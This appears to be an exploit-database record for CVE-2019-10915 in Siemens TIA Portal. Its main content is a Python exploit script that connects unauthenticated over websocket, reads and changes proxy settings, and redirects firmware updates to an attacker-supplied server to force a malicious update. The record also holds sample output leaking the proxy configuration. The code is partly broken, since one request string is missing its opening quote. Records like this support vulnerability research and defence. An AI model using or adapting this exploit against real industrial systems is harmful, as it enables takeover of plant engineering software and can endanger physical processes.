ID

VAR-E-201907-0133


EDB ID

47083


TITLE

Siemens TIA Portal - Remote Command Execution - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 47083

DESCRIPTION

Siemens TIA Portal - Remote Command Execution.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 47083

AFFECTED PRODUCTS

vendor:siemensmodel:tia portalscope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 47083 // EDBNET: 103070

EXPLOIT

##
# Exploit Title: Siemens TIA Portal unauthenticated remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Vendor Homepage: www.siemens.com
# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html
# Version: TIA Portal V15 Update 4
# Tested on: Windows 10
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
##

##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##

import websocket, ssl, argparse

parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("(optional) update_server", help="Malicious firmware update server IP")
args = parser.parse_args()

host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
# Read current proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
# Change application proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
# Force a malicious firmware update
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)

Trust: 1.0

sources: EXPLOIT-DB: 47083

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 47083

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 47083

TYPE

Remote Command Execution

Trust: 1.6

sources: EXPLOIT-DB: 47083 // EDBNET: 103070

CREDITS

Joseph Bingham

Trust: 0.6

sources: EXPLOIT-DB: 47083

EXTERNAL IDS

db:TENABLEid:TRA-2019-33

Trust: 1.6

db:EXPLOIT-DBid:47083

Trust: 1.6

db:EDBNETid:103070

Trust: 0.6

sources: EXPLOIT-DB: 47083 // EDBNET: 103070

REFERENCES

url:https://www.exploit-db.com/exploits/47083/

Trust: 0.6

sources: EDBNET: 103070

SOURCES

db:EXPLOIT-DBid:47083
db:EDBNETid:103070

LAST UPDATE DATE

2022-07-27T09:14:56.012000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:47083date:2019-07-10T00:00:00
db:EDBNETid:103070date:2020-06-28T00:00:00